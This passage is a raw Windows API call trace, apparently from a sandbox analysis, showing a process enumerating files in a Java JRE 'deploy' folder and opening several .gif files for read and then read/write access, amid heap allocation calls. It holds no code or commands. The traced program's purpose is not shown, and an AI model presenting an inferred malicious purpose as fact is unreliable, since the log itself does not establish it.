[0095.098] GetFileType (hFile=0x368) returned 0x1 [0095.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.098] CloseHandle (hObject=0x368) returned 1 [0095.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.099] AreFileApisANSI () returned 1 [0095.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0095.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0095.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 57 [0095.100] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x218e)) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.100] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bac, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="splash@2x.gif", cAlternateFileName="SPLASH~1.GIF")) returned 1 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0095.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0095.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0095.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.101] AreFileApisANSI () returned 1 [0095.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif", lpUsedDefaultChar=0x0) returned 60 [0095.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.101] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0095.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0095.101] AreFileApisANSI () returned 1 [0095.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0095.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0095.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 60 [0095.101] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.102] GetFileType (hFile=0x368) returned 0x1 [0095.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0095.102] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.102] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.102] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.102] CloseHandle (hObject=0x368) returned 1 [0095.103] AreFileApisANSI () returned 1 [0095.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0095.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 60 [0095.103] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.103] GetFileType (hFile=0x368) returned 0x1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.103] CloseHandle (hObject=0x368) returned 1 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.104] AreFileApisANSI () returned 1 [0095.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0095.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 60 [0095.104] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bac)) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.104] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e7d, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="splash_11-lic.gif", cAlternateFileName="SPLASH~2.GIF")) returned 1 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0095.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0095.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0095.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.105] AreFileApisANSI () returned 1 [0095.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif", lpUsedDefaultChar=0x0) returned 64 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0095.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.106] AreFileApisANSI () returned 1 [0095.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0095.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0095.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 64 [0095.106] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.276] GetFileType (hFile=0x368) returned 0x1 [0095.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0095.276] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.276] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.276] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.276] CloseHandle (hObject=0x368) returned 1 [0095.276] AreFileApisANSI () returned 1 